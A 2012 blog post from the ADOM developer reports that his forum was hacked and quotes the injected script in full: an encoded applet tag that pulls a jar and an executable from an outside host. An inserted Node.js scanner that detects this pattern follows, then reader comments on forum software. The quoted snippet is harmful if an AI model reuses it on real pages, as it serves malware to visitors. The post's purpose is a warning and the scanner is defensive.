Monday, May 7, 2012

www.adom.de/forums hacked once more :-(

Very bad start for the new idea: It seems that www.adom.de/forums (at least) got hacked once more. When I entered the site this morning an applet asked for permission to do "something" on my local computer. There seems to have been code injected into the forum software (once again), here's the piece of code responsible for the problem on the page itself:

<script language=JavaScript>m='%3Capplet%20name%3D%27Please%20Run%20To%20Continue%20%271%27%20height%3D%271%27%20code%3D%27taipans.class%27%20archive%3D%27http%3A//son1c.de/pferd/news/fud.jar%27%3E%3Cparam%20name%3D%22funtime%22%20%0A%0Avalue%3D%22http%3A//son1c.de/pferd/news/p.exe%22%3E%3C/applet%3E';d=unescape(m);document.write(d);</script> 


Naturally you never should allow that access. Please be careful and refrain from using the forums for now until we know better what has happened. Needless to say that this once more is a major setback for me as it took days and days last time to sort that stuff out and I fear for the worst :-(


Needless to say that many thoughts of exterminating those f**** hackers currently are crossing my mind.
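The injected snippet quoted in the post hides an `<applet>` tag inside a percent-encoded string and writes it into the page with `unescape()` and `document.write()`. As an added example (not part of the original post or of the forum software), this Node.js scanner flags that pattern in saved page or template HTML and decodes the string without executing it; the sample page, the `example.invalid` host and all function names are constructed for illustration.

```javascript
// Added example: static scan for the "unescape + document.write" injection pattern.
// It never runs the page's script; it only decodes quoted string literals.
const SAMPLE_HTML = [ // constructed sample page, placeholder host
  '<html><body><div class="post">Hello</div>',
  "<script language=JavaScript>m='%3Capplet%20code%3D%27x.class%27%20" +
    "archive%3D%27http%3A//files.example.invalid/a.jar%27%3E%3Cparam%20name%3D%22u%22%20" +
    "value%3D%22http%3A//files.example.invalid/b.exe%22%3E%3C/applet%3E';" +
    "d=unescape(m);document.write(d);</script>",
  "<script>var greeting = 'hello%20world';</script>",
  '</body></html>',
].join('\n');

const SCRIPT_RE = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
const LITERAL_RE = /(['"])((?:%[0-9a-fA-F]{2}|[^'"\\])*)\1/g;
const ACTIVE_TAG_RE = /<\s*(applet|object|embed|iframe|script)\b/i;
const URL_RE = /https?:\/\/[^\s'"<>]+/gi;

// Decode %XX the way unescape() does, leaving malformed sequences untouched.
function decodePercent(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

function scanHtml(html) {
  const findings = [];
  for (const m of html.matchAll(SCRIPT_RE)) {
    const body = m[1];
    // Only look at scripts that both decode a string and write markup into the page.
    if (!/\b(unescape|decodeURIComponent)\s*\(/.test(body)) continue;
    if (!/document\.write(ln)?\s*\(/.test(body)) continue;
    for (const lit of body.matchAll(LITERAL_RE)) {
      if (!/%[0-9a-fA-F]{2}/.test(lit[2])) continue;
      const decoded = decodePercent(lit[2]);
      const tag = decoded.match(ACTIVE_TAG_RE);
      if (tag) findings.push({ tag: tag[1].toLowerCase(), urls: decoded.match(URL_RE) || [], decoded });
    }
  }
  return findings;
}

for (const f of scanHtml(SAMPLE_HTML)) {
  console.log(`hidden <${f.tag}> tag loading: ${f.urls.join(', ')}`);
}
```

Run it over HTML fetched with a non-browser client or over exported forum templates, so the page is inspected without ever being rendered.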

7 comments:

  1. I do not dare to venture to the forums now, but may I ask what software you're using? phpBB, SMF, something else?

  2. I believe he's using vbulletin

  3. Yes, vBulletin. Not quite the latest patch level - which already might be the source of trouble. If it is I probably will have to look into some sort of hosted solution since I just fail to have the time to continue with each and every patch. Which additionally is a problem as vBulletin no longer officially supports the project tools used for issue management and losing all that stuff would be a major setback. *Sigh*

  4. Ah, ok, so vBulletin is hooked up to some kind of issue tracker with single sign on etc? And forum users can post and read issues using their forum account?

  5. Yeah. Sadly the issue tracker has been open sourced in 2010 (IIRC) and support is... shaky at best. But I yet need to have a good idea on how to proceed with the forum / issue tracker topic. And I'd hate to lose all the existing issues which is the far worse problem.

  6. Limit the upload MIME types? Usually these exploits in website scripts are just taken advantage of by script kiddies. I doubt the hacker(s) found this for themselves simply to try to take advantage of JUST your site.

  7. I think what you could do is ask the community for a volunteer that would have access to update and maintain the forums for you. I'm not very fond of -or knowledgeable about- web administration, but I'm sure other people are, and that way you would have more time for the important thing - developing ADOM/ADOM II.
